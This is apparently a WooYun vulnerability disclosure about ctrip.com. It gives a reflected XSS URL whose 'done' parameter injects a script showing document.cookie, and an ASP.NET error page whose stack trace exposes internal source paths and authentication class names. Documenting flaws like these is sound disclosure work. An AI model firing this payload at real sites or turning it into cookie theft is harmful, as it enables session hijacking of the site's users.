WooYun.org

1.xss http://www.ctrip.com/Member/RemindPWD.asp?email=&uid=&signin_logintype=&done=">%3Cscript%3Ealert%28/document.cookie/%29%3C/script%3E
2.physical
“/myctrip”应用程序中的服务器错误。
未将对象引用设置到对象的实例。
说明: 执行当前 Web 请求期间，出现未处理的异常。请检查堆栈跟踪信息，以了解有关该错误以及代码中导致错误的出处的详细信息。
异常详细信息: System.NullReferenceException: 未将对象引用设置到对象的实例。
源错误:
执行当前 Web 请求期间生成了未处理的异常。可以使用下面的异常堆栈跟踪信息确定有关异常原因和发生位置的信息。
堆栈跟踪:
[NullReferenceException: 未将对象引用设置到对象的实例。]
Ctrip.Common.Utility.UserAuth.CheckUserToken(String tokenString) in D:\CtripCode\SystemSolution\ADSystem\Ctrip.BaseFramework\BaseFramework\Utility\Utility\UserAuth.cs:32
Customer.MyCtrip.Presenter.BaseIPage.GetUserProfile() in a:\CtripSolution\Customer\MAINLINE\Customer\MyCtripSolution\PresenterLayer\Presenter\Customer.MyCtrip.Presenter\BaseClass\BaseIPage.cs:208
Customer.MyCtrip.Presenter.SecureBaseIPage.OnLoad(EventArgs e) in a:\CtripSolution\Customer\MAINLINE\Customer\MyCtripSolution\PresenterLayer\Presenter\Customer.MyCtrip.Presenter\BaseClass\SecureBaseIPage.cs:27
System.Web.UI.Control.LoadRecursive() +47
System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1436